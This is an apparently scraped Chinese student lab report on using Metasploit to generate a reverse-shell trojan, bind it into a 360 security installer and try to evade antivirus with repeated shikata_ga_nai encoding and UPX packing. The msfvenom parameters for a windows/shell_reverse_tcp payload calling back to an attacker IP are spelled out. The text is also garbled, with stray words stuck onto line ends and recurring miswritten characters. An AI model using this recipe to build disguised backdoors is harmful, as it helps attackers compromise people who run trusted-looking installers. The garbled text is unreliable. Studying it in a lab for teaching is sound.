2017-2018-1 20179202《Linux內核原理與分析》第十一週做業

時間 2020-07-10

標籤 Linux內核原理與分析第十一週 1周欄目 Linux 简体版

原文原文鏈接

Metasploit實現木馬生成、捆綁、免殺

1.預備知識

(1)Metasploithtml

Metasploit是一款開源的安全漏洞檢測工具，全稱叫作The Metasploit Framework，簡稱MSF。MSF是一個漏洞框架，它容許使用者開發本身的漏洞腳本，從而進行測試。下圖爲Metasploit的體系結構：linux

圖片來源玩轉Metasploit系列（第一集）shell

基礎庫文件：windows

Rex:Metasploit中的基礎庫，用於支持不一樣的協議、轉換，以及套接字處理
MSF CORE：該庫對框架進行了定義，同時提供Metasploit的基本應用界面
MSF BASE：該庫提供了Metasploit框架的一個簡化的、友好的應用界面

模塊（經過Metasploit框架所裝載、集成並對外提供的最核心的滲透測試功能實現代碼）安全

滲透攻擊模塊（Exploits)：利用發現的安全漏洞或配置弱點對遠程目標系統進行攻擊，以植入和運行攻擊載荷，從而得到對目標系統訪問控制權的代碼組件
攻擊載荷模塊（Payloads)：在滲透攻擊成功後促使目標系統運行的一段植入代碼，一般做用是爲滲透攻擊者打開在目標系統上的控制會話鏈接
編碼器模塊（Encoders)：確保攻擊載荷中不會出現滲透攻擊過程當中應加以免的」壞字符「；對攻擊載荷進行」免殺「處理
後滲透攻擊模塊（Post-Modes)：主要支持在滲透攻擊取得目標系統遠程控制權以後，在受控系統中進行各類各樣的後滲透攻擊動做，好比獲取敏感信息，進一步括展，實施跳板攻擊等
輔助模塊（Auxiliary)：沒有攻擊載荷的漏洞攻擊，用於諸如端口掃描、指紋驗證、服務掃描等任務中

(2)攻擊載荷工具框架

msfpayload：用於生產並輸出Metasploit全部類型的可用shell代碼
msfencode：對msfpayload生成的shell代碼進行編碼，使得shell代碼可以適應目標系統環境，更好地實現其功能
msfvenom：是msfpayload和msfencode的混合體

2.實驗

（1）選擇攻擊載荷tcp

輸入msfconsole進入metasploit控制檯：工具

輸入show payloads查看全部能夠使用的攻擊載荷信息：測試

這次實驗咱們使用的是windows/shell_reverse_tcp（一個簡單的反彈shell程序，功能是鏈接靶機的命令行）。編碼

（2）選擇捆綁文件

能夠建立本身的EXE文件，也能夠捆綁到其餘EXE文件。本次實驗選擇捆綁，我找了360的安裝軟件（360.exe）

（3）免殺

製做一個免殺的木馬來繞過殺毒軟件的檢測。在Meatsploit框架下免殺的方式之一是使用MSF編碼器。msfvenom -l encoders查看編碼方式(並非全部的編碼方式都在windows系統上可用)：

本次實驗選擇x86/shikata_ga_nai：

（4）生成、捆綁、免殺的實現

實驗環境：

攻擊機 Kali linux IP：192.168.177.133

靶機 win7 IP：192.168.177.1

命令解釋：

msfvenom -p windows/shell_reverse_tcp 使用shell_reverse_tcp攻擊載荷
LHOST=192.168.177.133                 設置攻擊者IP地址
LPORT=8080                          設置攻擊者的監聽端口，用於接收木馬的連接請求
-e x86/shikata_ga_nai                 使用shikata_ga_nai的編碼方式
-x 360.exe                            將木馬捆綁在360.exe上
-i 5                                  對目標進行5次編碼
-f exe                                指定MSF編碼器輸出格式爲exe
-o /root/backdoor.exe                 指定處理完畢後的文件輸出路徑

下面進行測試，設置好後等待木馬的連接：

在win7上運行製做好的backdoor.exe，很遺憾被360查殺：

用不一樣的編碼方式多編碼幾回：

運行後仍舊被360查殺：

再嘗試加殼處理，輸入upx參看upx加殼軟件參數。upx -5 backdoor.exe 對backdoor.exe進行加殼（此處爲壓縮處理，加殼的不便之處就是會改變源文件的大小，有經驗的安全人員很容易發現這點差異）：

尷尬 ......依然被查殺，能夠看到木馬名稱有變：

因爲是第一次接觸安全系統與軟件，因此本次實驗感謝王政同窗的指導，遇到的問題再仔細琢磨後解決。